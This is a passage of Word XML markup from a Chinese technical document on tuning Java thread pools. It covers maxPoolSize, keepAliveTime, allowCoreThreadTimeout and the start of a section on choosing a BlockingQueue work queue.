          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="0004694D" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>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ab/>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当系统负载达到最大值时，核心线程数已无法按时处理完所有任务，这时就需要增加线程。每秒</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个任务需要</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个线程，那么当每秒达到</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个任务时，则需要</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1000-queueCapacity)*(20/200)</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个线程，可将</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004694D" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069188C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>keepAliveTime:</w:t>
      </w:r>
      <w:r w:rsidR="0004694D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="0004694D" w:rsidRDefault="0004694D" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程数量只增加不减少也不行。当负载降低时，可减少线程数量，如果一个线程空闲时间达到</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>keepAliveTiime</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，该线程就退出。默认情况下线程池最少会保持</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="0069188C" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069188C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allowCoreThreadTimeout:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRDefault="0004694D" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>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ab/>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认情况下核心线程不会退出，可通过将该参数设置为</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，让核心线程也退出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97DB3" w:rsidRPr="00F97DB3" w:rsidRDefault="00F97DB3" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以上关于线程数量的计算并没有考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的情况。若结合</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的情况，比如，当线程数量达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也不合适，此时若系统负载长时间维持在每秒</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个任务，则超出线程池处理能力，应设法降低每个任务的处理时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(tasktime)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00992CA5" w:rsidRDefault="00B51D31" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C398B" w:rsidRDefault="003C398B" w:rsidP="003C398B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="00F34915">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>线程池</w:t>
      </w:r>
      <w:r w:rsidR="00196F10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>工作队列选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00DF55C6">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:tooltip="java.util.concurrent 中的接口" w:history="1">
        <w:r w:rsidRPr="00DF55C6">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="CA0000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>BlockingQueue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都可用于传输和保持提交的任务。可以使用此队列与池大小进行交互：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果运行的线程少于</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executor </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>始终首选添加新的线程，而不进行排队。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果运行的线程等于或多于</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
